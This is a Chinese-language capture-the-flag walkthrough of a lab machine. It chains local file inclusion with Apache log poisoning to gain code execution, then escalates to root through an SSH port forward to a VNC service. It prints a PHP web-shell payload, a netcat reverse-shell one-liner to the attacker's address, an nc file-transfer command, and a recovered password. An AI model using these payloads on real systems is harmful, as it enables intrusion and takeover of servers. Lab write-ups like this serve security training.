端口信息
sudo nmap -sC -sV -A -p 22,80 10.10.10.84
访问80端口,显然是一个文件包含,故意输入一个不存在的文件名,爆出当前路径,不管有用没用,这是基操,在src里也是一个敏感信息泄露的低危
找到了pwdbackup.txt,密码是加密的
/etc/passwd
检查apache的访问日志,搜apache access logs freebsd就行
https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/
访问日志记录了对服务器的请求
比如抓包把user-agent改为gakki,对应的访问记录里也会有gakki
现在的思路就是能不能通过这种方式让服务器执行命令,把lfi转换成rce这样
可以在http数据包的一些信息里加上php语句
<?php system($_REQUEST['command']); ?>
传入参数
远程连接
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.22 9001 >/tmp/f
kali监听到shell,权限不高
可以看到有charix用户
另一种拿shell的姿势是利用phpinfo+lfi的方法
前提是phpinfo()的信息里允许file_upload
漏洞原理不说了,网上有,搜phpinfo lfi
用exp也可以拿shell
现在破解密码,前面说了经过了13次加密,后面有=,判断是base64加密,解密就行了,注意密文不要有换行
明文Charix!2#4%6&8(0
ssh连接
sudo -l命令被禁用,目录下发现secret.zip文件,下载到本地
靶机运行
nc 10.10.14.22 4444 < secret.zip
kali运行
nc -lvnp 4444 > secret.zip
解压zip文件,密码就是前面解密的明文
查看发现乱码
靶机检查运行的进程ps aux
发现以root用户运行的XVNC服务,具体这个服务是干啥的网上有
netstat -an
查看端口
XVNC服务只接受本地的5901端口的请求,所以我们的kali是无法直接访问的,这就涉及到本地端口转发
ssh -L localhost:5901:localhost:5901 root@103.59.22.17
可以将发送到本地主机A1端口5901的请求,转发到远程云主机B1的5901端口
这个本地的端口可以随便填
kali访问xnc服务,这个密码就是前面得到的secret
vncviewer 127.0.0.1:9003 -passwd secret
转发成功,拿到root权限
总结
抛开脑洞那些,第一就是php文件包含漏洞结合apache的访问日志的操作,其次靶机主要绕在提权上,还用到了本地端口转发的知识,拿到shell之后除了sudo -l一下,还有检查一下运行的进程和开启的端口,特别是root用户开的端口和服务,个人感觉难度中等偏下。